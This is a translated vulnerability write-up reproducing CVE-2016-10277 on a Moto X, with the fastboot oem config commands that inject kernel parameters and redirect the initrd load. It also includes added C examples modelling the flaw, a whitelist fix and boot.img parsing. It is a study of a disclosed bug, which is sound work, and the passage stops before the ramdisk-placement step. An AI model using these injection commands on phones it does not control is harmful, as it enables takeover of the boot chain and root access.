myhack58 | Thor@MS509Team | MYHACK58:62201787385
History: Jun 26, 2017 - 12:00 a.m.

CVE-2016-10277 exploitation practice on a MOTO X phone - Vulnerability Alert - Black Bar Safety Net (myhack58)

2017-06-26 00:00:00
thor@MS509Team
www.myhack58.com

CVSS3: 7.8 High
  Attack Vector: LOCAL
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: REQUIRED
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS2: 9.3 High
  Access Vector: NETWORK
  Access Complexity: MEDIUM
  Authentication: NONE
  Confidentiality Impact: COMPLETE
  Integrity Impact: COMPLETE
  Availability Impact: COMPLETE
  Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

EPSS: 0.002 Low (percentile 55.0%)

CVE-2016-10277 is a high-severity vulnerability in the bootloader of Motorola phones. Through kernel command-line injection an attacker can hijack the phone's boot process and make it load an initramfs under the attacker's control, and from there gain root. We happened to have a Motorola MOTO X at hand, so we followed the exploitation process described in [1] and reproduced CVE-2016-10277 on it. The reproduction was still quite tortuous.
0x00 System environment

  1. Phone: MOTO X (XT1581)
  2. System firmware version: XT1581_KINZIE_RETCN_DS_5.1.1_LPK23.229, not rooted
  3. Android version: 5.1.1
    The exploitation process needs the phone's boot.img, aboot and initramfs. Since the phone is not rooted, these cannot be extracted from the device itself, but fortunately the matching system firmware could be found online and they were extracted from it directly.
    0x01 Vulnerability principle
    The basic principle of CVE-2016-10277 is not complicated: configuration parameters set through fastboot are injected by the bootloader into the kernel command line. First, the configuration parameters can be viewed with fastboot oem config:
    ![](/Article/UploadPic/2017-6/20176268372521.png?www.myhack58.com)
    These parameters are not protected. Even with the bootloader locked, they can still be set with the fastboot oem config command:
    ![](/Article/UploadPic/2017-6/20176268372335.png?www.myhack58.com)
    The vulnerability is that the bootloader does not filter these configuration values and passes them straight through to the kernel command line. Injected kernel command-line parameters influence what the kernel does while booting, so an attacker who constructs them carefully can take control of the phone's boot and ultimately obtain root.
    0x02 Vulnerability verification
    First we need to determine whether this MOTO X is affected by CVE-2016-10277.
  1. Inject a parameter that sets a property
    Run the command:
    fastboot oem config fsg-id "a androidboot.bar=1"
    ![](/Article/UploadPic/2017-6/20176268372700.png?www.myhack58.com)
    This injects the parameter androidboot.bar=1. The leading "a" is a harmless dummy value for fsg-id itself; the space after it ends that parameter, so the rest of the string reaches the kernel as a separate parameter. If the injection succeeds, the system property ro.boot.bar will be set to 1, because init exports every androidboot.* kernel parameter as a ro.boot.* property. Of course, bar is just a property name we made up here.
  2. Boot the system and check the property
    Run the commands:
    fastboot continue
    adb shell getprop ro.boot.bar
    ![](/Article/UploadPic/2017-6/20176268372268.png?www.myhack58.com)
    The system property has been set successfully, which shows that the kernel command-line injection worked, and therefore that this MOTO X is affected by CVE-2016-10277.
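To make the mechanism of 0x01 and 0x02 concrete, here is an added example written for this page; it is not the article's code and not Motorola's bootloader source, which is not available here. It models the vulnerable pattern as plain concatenation of the stored fsg-id value onto the kernel command line, places a whitelist check beside it as one way a bootloader could close the hole, and then looks the injected key up the way the kernel and init would. The base command line is a constructed sample; the fsg-id key, the "a androidboot.bar=1" value and the ro.boot.bar property are the ones used above.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Vulnerable pattern (modelled, not Motorola's source): the bootloader appends
 * the stored fsg-id value to the kernel command line unchecked. A space inside
 * the value terminates the fsg-id parameter, and whatever follows becomes a new
 * kernel parameter. Returns 0 on success, -1 if the buffer is too small. */
int build_cmdline_vulnerable(char *out, size_t out_len,
                             const char *base, const char *fsg_id)
{
    int n = snprintf(out, out_len, "%s fsg-id=%s", base, fsg_id);
    return (n < 0 || (size_t)n >= out_len) ? -1 : 0;
}

/* Hardened check: a configuration value that will be spliced into the command
 * line may only contain a conservative character set, so it can never end its
 * own parameter or start another. */
int fsg_id_is_safe(const char *fsg_id)
{
    if (*fsg_id == '\0' || strlen(fsg_id) > 64)
        return 0;
    for (const char *p = fsg_id; *p; p++)
        if (!isalnum((unsigned char)*p) && *p != '-' && *p != '_' && *p != '.')
            return 0;
    return 1;
}

int build_cmdline_hardened(char *out, size_t out_len,
                           const char *base, const char *fsg_id)
{
    if (!fsg_id_is_safe(fsg_id))
        return -1;                  /* refuse the tampered value */
    return build_cmdline_vulnerable(out, out_len, base, fsg_id);
}

/* Kernel-style lookup: find "key=" at a parameter boundary and copy the value
 * up to the next space. This is how androidboot.bar=1 becomes visible to init,
 * which exports it as ro.boot.bar. Returns 1 if found, 0 otherwise. */
int cmdline_get(const char *cmdline, const char *key, char *val, size_t val_len)
{
    size_t klen = strlen(key);
    const char *p = cmdline;
    if (val_len == 0)
        return 0;
    while ((p = strstr(p, key)) != NULL) {
        if ((p == cmdline || p[-1] == ' ') && p[klen] == '=') {
            const char *v = p + klen + 1;
            size_t n = strcspn(v, " ");
            if (n >= val_len) n = val_len - 1;
            memcpy(val, v, n);
            val[n] = '\0';
            return 1;
        }
        p += klen;
    }
    return 0;
}

int main(void)
{
    char cmd[256], val[64];
    /* Constructed base command line; the real one is device specific. */
    const char *base = "console=ttyHSL0,115200,n8 androidboot.hardware=qcom";
    /* Value set by: fastboot oem config fsg-id "a androidboot.bar=1"
     * ("a" is the dummy fsg-id; the space ends it). */
    const char *tampered = "a androidboot.bar=1";

    build_cmdline_vulnerable(cmd, sizeof cmd, base, tampered);
    printf("vulnerable: %s\n", cmd);
    if (cmdline_get(cmd, "androidboot.bar", val, sizeof val))
        printf("  kernel sees androidboot.bar=%s, init exports ro.boot.bar=%s\n", val, val);

    if (build_cmdline_hardened(cmd, sizeof cmd, base, tampered) < 0)
        printf("hardened: rejected fsg-id value \"%s\"\n", tampered);
    return 0;
}
```

The whitelist is only one way to close the splice; the point the example makes is that any unfiltered value that reaches the command line is equivalent to full control over it, since the kernel parses parameters purely by whitespace.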
    0x03 Exploitation
    Using the command-line injection we can inject a number of parameters into the kernel command line, and those parameters are referenced in more than one place during OS startup, so the attack surface of this vulnerability is wide. Here we mainly try to use it for root privilege escalation. We first briefly introduce the phone's boot process and locate one of the usable points.
  1. Secure boot process of an Android phone
    Most MOTO phones use Qualcomm chips, and a Qualcomm-based phone generally boots as follows:
    [Primary Bootloader (PBL)]
      `-> [Secondary Bootloader (SBL)]
            `-> [Applications Bootloader (ABOOT)]
                  `-> [{boot,recovery}.img] -- Linux Kernel + initramfs
                        `-> [system.img]
    After power-on the bootloader runs first. It is itself roughly divided into three stages: PBL first, then SBL, then ABOOT. Finally ABOOT loads the Linux kernel and the initramfs from boot.img or recovery.img, and the system startup phase begins. The initramfs is a RAM file system; the bootloader normally loads it at a fixed memory address, and once the kernel is up it is mounted as the root file system, i.e. /. The initramfs contains many important files, including the first user-mode process init, the service startup script init.rc, the SELinux policy file sepolicy, the adbd binary and so on. If we can make the system load an initramfs we have constructed, we can carry out a great deal of hijacking from there. One attack surface of CVE-2016-10277 is exactly this: by injecting kernel command-line parameters we control the address the initramfs is loaded from at boot, and so load an initramfs of our choosing.
  2. Hijacking the initramfs load through parameter injection
    Through CVE-2016-10277 we can inject the initrd parameter into the kernel, which controls the memory address the initramfs is loaded from. The parameter has the form:
    initrd=<load address>,<size>
    First we test whether the initramfs load address can be hijacked, with the following commands:
    fastboot oem config fsg-id "a initrd=0x12341234,1024"
    fastboot continue
    ![](/Article/UploadPic/2017-6/20176268372776.png?www.myhack58.com)
    After running these commands the phone falls into an endless boot loop and cannot enter the system: the phone has crashed, which shows that the initrd parameter took effect. To verify that the initramfs load was really hijacked, we still need to obtain a usable initramfs, and find a way to place it in memory at an address the injected parameter can point at.
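The following is an added example, written for this page and taken neither from the article nor from the kernel source. It parses initrd=<address>,<size> out of a kernel command line in the same shape the kernel's early initrd parameter handler accepts (two numbers, base 0 so 0x prefixes work), and then applies the kind of range check the ARM kernel performs before it will use an initrd: the range must lie inside known RAM, otherwise the initrd is ignored. The RAM region and the command lines are constructed sample data, not the XT1581's memory map.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* A physical RAM region as the bootloader/kernel would know it. The values used
 * below are constructed sample data, not the XT1581's real memory map. */
struct mem_region { uint64_t start; uint64_t size; };

/* Extract "initrd=<start>,<size>" from a kernel command line, mirroring the
 * shape the kernel's early initrd handler accepts (two numbers, base 0 so
 * 0x-prefixed hex works). Returns 1 on success, 0 if absent or malformed. */
int parse_initrd_param(const char *cmdline, uint64_t *start, uint64_t *size)
{
    const char *p = cmdline;
    while ((p = strstr(p, "initrd=")) != NULL) {
        if (p == cmdline || p[-1] == ' ') {        /* must be its own parameter */
            const char *v = p + 7;
            char *end;
            uint64_t s = strtoull(v, &end, 0);
            if (end == v || *end != ',')
                return 0;
            v = end + 1;
            uint64_t n = strtoull(v, &end, 0);
            if (end == v || (*end != '\0' && *end != ' '))
                return 0;
            *start = s;
            *size = n;
            return 1;
        }
        p += 7;
    }
    return 0;
}

/* Is [start, start+size) fully inside one known RAM region? This is the kind of
 * sanity check the ARM kernel applies before trusting an initrd location; an
 * initrd that fails it is dropped, and a boot that depends on it cannot finish. */
int initrd_in_ram(uint64_t start, uint64_t size,
                  const struct mem_region *regions, size_t nregions)
{
    if (size == 0 || start + size < start)        /* empty or wrapping range */
        return 0;
    for (size_t i = 0; i < nregions; i++) {
        uint64_t rs = regions[i].start, re = rs + regions[i].size;
        if (start >= rs && start + size <= re)
            return 1;
    }
    return 0;
}

int main(void)
{
    /* Constructed map: 2 GiB of DDR starting at 0x80000000 (placeholder). */
    const struct mem_region ram[] = { { 0x80000000ULL, 0x80000000ULL } };
    const char *tests[] = {
        "console=ttyHSL0,115200,n8 fsg-id=a initrd=0x12341234,1024",    /* the probe used above */
        "console=ttyHSL0,115200,n8 fsg-id=a initrd=0x82000000,0x200000",
        "console=ttyHSL0,115200,n8 fsg-id=a initrd=0x82000000",          /* malformed: no size */
    };
    for (size_t i = 0; i < sizeof tests / sizeof tests[0]; i++) {
        uint64_t s, n;
        if (!parse_initrd_param(tests[i], &s, &n))
            printf("%s\n  -> no valid initrd= parameter\n", tests[i]);
        else
            printf("%s\n  -> initrd at 0x%llx (+0x%llx): %s\n", tests[i],
                   (unsigned long long)s, (unsigned long long)n,
                   initrd_in_ram(s, n, ram, 1) ? "inside RAM, would be used"
                                               : "outside RAM, would be dropped");
    }
    return 0;
}
```

Whatever the exact failure path on the XT1581, an initrd that points where the kernel cannot find a usable image leaves it without a root file system, which is consistent with the boot loop observed above; the useful value for an attacker is one that lands inside RAM at a location they can fill first.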
    Because the firmware differs from phone to phone, the initramfs cannot be taken from just any device; we can only download the matching system firmware online and extract the initramfs from it. After downloading and unpacking the firmware, find boot.img and unpack it with the imgtool tool to extract the kernel and ramdisk:
    ![](/Article/UploadPic/2017-6/20176268372392.png?www.myhack58.com)
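What the imgtool step does can be shown with a small parser, added here as an example; it is my code, not imgtool's and not the article's. The Android boot.img v0 header begins with the magic ANDROID! followed by kernel_size, kernel_addr, ramdisk_size, ramdisk_addr, second_size, second_addr, tags_addr and page_size as little-endian 32-bit words; the kernel follows the one-page header and the ramdisk follows the page-padded kernel. The sample image is built in memory from constructed data, and the load addresses it carries are placeholders, not the XT1581's.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* Leading fields of the Android boot.img v0 header, as byte offsets. */
#define BOOT_MAGIC        "ANDROID!"
#define BOOT_MAGIC_SIZE   8
#define OFF_KERNEL_SIZE   8
#define OFF_KERNEL_ADDR   12
#define OFF_RAMDISK_SIZE  16
#define OFF_RAMDISK_ADDR  20
#define OFF_PAGE_SIZE     36   /* after second_size, second_addr, tags_addr */

struct boot_layout {
    uint32_t page_size;
    uint32_t kernel_off,  kernel_size,  kernel_addr;
    uint32_t ramdisk_off, ramdisk_size, ramdisk_addr;
};

static uint32_t rd32(const uint8_t *p)          /* little-endian u32 read */
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void wr32(uint8_t *p, uint32_t v)        /* little-endian u32 write */
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

static uint64_t align_up(uint64_t v, uint64_t a) { return (v + a - 1) / a * a; }

/* Locate kernel and ramdisk inside a boot.img buffer: the header occupies one
 * page, the kernel starts at page 1, and the ramdisk follows the page-padded
 * kernel. Returns 0 on success, -1 on bad magic, bad page size or truncation. */
int parse_boot_img(const uint8_t *img, size_t len, struct boot_layout *out)
{
    if (len < 40 || memcmp(img, BOOT_MAGIC, BOOT_MAGIC_SIZE) != 0)
        return -1;
    uint32_t ps = rd32(img + OFF_PAGE_SIZE);
    if (ps < 2048 || ps > 16384 || (ps & (ps - 1)) != 0)  /* mkbootimg: 2K..16K, power of two */
        return -1;
    uint32_t ksz = rd32(img + OFF_KERNEL_SIZE), rsz = rd32(img + OFF_RAMDISK_SIZE);
    uint64_t koff = ps;
    uint64_t roff = koff + align_up(ksz, ps);
    if (roff + rsz > len)                                  /* image shorter than header claims */
        return -1;
    out->page_size    = ps;
    out->kernel_off   = (uint32_t)koff;
    out->kernel_size  = ksz;
    out->kernel_addr  = rd32(img + OFF_KERNEL_ADDR);
    out->ramdisk_off  = (uint32_t)roff;
    out->ramdisk_size = rsz;
    out->ramdisk_addr = rd32(img + OFF_RAMDISK_ADDR);
    return 0;
}

/* Android ramdisks are gzip-compressed cpio archives; checking the gzip magic
 * catches a wrong offset before the bytes are fed to gunzip | cpio -i. */
int ramdisk_is_gzip(const uint8_t *img, size_t len, const struct boot_layout *l)
{
    if ((uint64_t)l->ramdisk_off + 2 > len) return 0;
    return img[l->ramdisk_off] == 0x1f && img[l->ramdisk_off + 1] == 0x8b;
}

/* Build a small synthetic boot.img (constructed test data, not real firmware):
 * 2 KiB pages, a 3000-byte fake kernel (padded to 4096) and a 500-byte fake
 * ramdisk carrying only the gzip magic. Returns the image length, 0 if buf is too small. */
size_t make_sample_boot_img(uint8_t *buf, size_t cap)
{
    const uint32_t ps = 2048, ksz = 3000, rsz = 500;
    size_t total = (size_t)(ps + align_up(ksz, ps) + align_up(rsz, ps));
    if (cap < total) return 0;
    memset(buf, 0, total);
    memcpy(buf, BOOT_MAGIC, BOOT_MAGIC_SIZE);
    wr32(buf + OFF_KERNEL_SIZE, ksz);  wr32(buf + OFF_KERNEL_ADDR, 0x00008000);  /* placeholder addresses */
    wr32(buf + OFF_RAMDISK_SIZE, rsz); wr32(buf + OFF_RAMDISK_ADDR, 0x02000000);
    wr32(buf + OFF_PAGE_SIZE, ps);
    memset(buf + ps, 0xAA, ksz);                           /* fake kernel bytes */
    uint8_t *rd = buf + ps + align_up(ksz, ps);
    memset(rd, 0xBB, rsz);                                 /* fake ramdisk bytes */
    rd[0] = 0x1f; rd[1] = 0x8b;                            /* gzip magic */
    return total;
}

int main(void)
{
    uint8_t img[16384];
    struct boot_layout bl;
    size_t n = make_sample_boot_img(img, sizeof img);
    if (parse_boot_img(img, n, &bl) != 0) { puts("not a boot.img"); return 1; }
    printf("page_size=%u kernel@%u (%u bytes, load 0x%08x) ramdisk@%u (%u bytes, load 0x%08x) gzip=%d\n",
           bl.page_size, bl.kernel_off, bl.kernel_size, bl.kernel_addr,
           bl.ramdisk_off, bl.ramdisk_size, bl.ramdisk_addr, ramdisk_is_gzip(img, n, &bl));
    /* Extraction is then fwrite(img + bl.ramdisk_off, 1, bl.ramdisk_size, f), followed by gunzip | cpio -i. */
    return 0;
}
```

Two of the header fields matter for what follows: ramdisk_size tells you how large the image you must place in memory is, and ramdisk_addr is where aboot puts the ramdisk by default, the location that an injected initrd= parameter redirects.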
    The ramdisk here is the initramfs we are looking for. Next we need a way to get our ramdisk into memory, using the following command:

